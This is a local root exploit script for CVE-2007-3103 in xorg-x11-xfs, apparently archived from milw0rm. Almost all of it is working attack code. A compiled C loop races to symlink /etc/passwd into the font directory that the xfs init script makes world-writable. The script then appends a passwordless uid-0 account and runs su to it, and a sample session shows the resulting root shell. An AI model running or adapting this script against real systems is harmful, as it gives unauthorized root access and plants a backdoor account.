X.Org xorg-x11-xfs <= 1.0.2-3.1 - Local Race Condition Exploit

#!/bin/sh # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) # # Another lame xploit by vl4dZ :)) works on redhat el5 and before # # $ id # uid=1001(kecos) gid=1001(user) groups=1001(user) # $ sh xfs-RaceCondition-root-exploit.sh # [*] Generate large data file in /tmp/.font-unix # [*] Wait for xfs service to be (re)started by root... # [*] Hop, symlink created... # [*] Launching root shell # -sh-3.1# id # uid=0(root) gid=0(root) groups=0(root) # Vulnerable version is xorg-x11-xfs &#60;= 1.0.2-3.1 and vulnerable code is # located in the start() function of the /etc/init.d/xfs script: # ... # rm -rf $FONT_UNIX_DIR # mkdir $FONT_UNIX_DIR # chown root:root $FONT_UNIX_DIR # chmod 1777 $FONT_UNIX_DIR # ... # I&#39;m listening right now to nice free music: # http://www.jamendo.com/fr/album/5919 FontDir=&#34;/tmp/.font-unix&#34; Zero=/dev/zero Size=900000 if [ ! -d $FontDir ]; then printf &#34;Is xfs running ?\n&#34; exit 1 fi cd /tmp cat &#62; sym.c &#60;&#60; EOF #include &#60;unistd.h&#62; int main(){ for(;;){if(symlink(&#34;/etc/passwd&#34;,&#34;/tmp/.font-unix&#34;)==0) {return 0;}}} EOF cc sym.c -o sym&#62;/dev/null 2&#62;&1 if [ $? != 0 ]; then printf &#34;Error: Cant compile code&#34; exit 1 fi printf &#34;[*] Generate large data file in $FontDir\n&#34; dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}&#62;/dev/null 2&#62;&1 if [ $? != 0 ]; then printf &#34;Error: cant create large file&#34; exit 1 fi printf &#34;[*] Wait for xfs service to be (re)started by root...\n&#34; ./sym if [ $? != 0 ]; then printf &#34;Error: code failed...\n&#34; exit 1 fi if [ -L /tmp/.font-unix ]; then printf &#34;[*] Hop, symlink created...\n&#34; printf &#34;[*] Launching root shell\n&#34; sleep 2 rm -f /tmp/.font-unix echo &#34;r00t::0:0::/:/bin/sh&#34; &#62;&#62; /etc/passwd fi su - r00t # milw0rm.com [2008-02-21]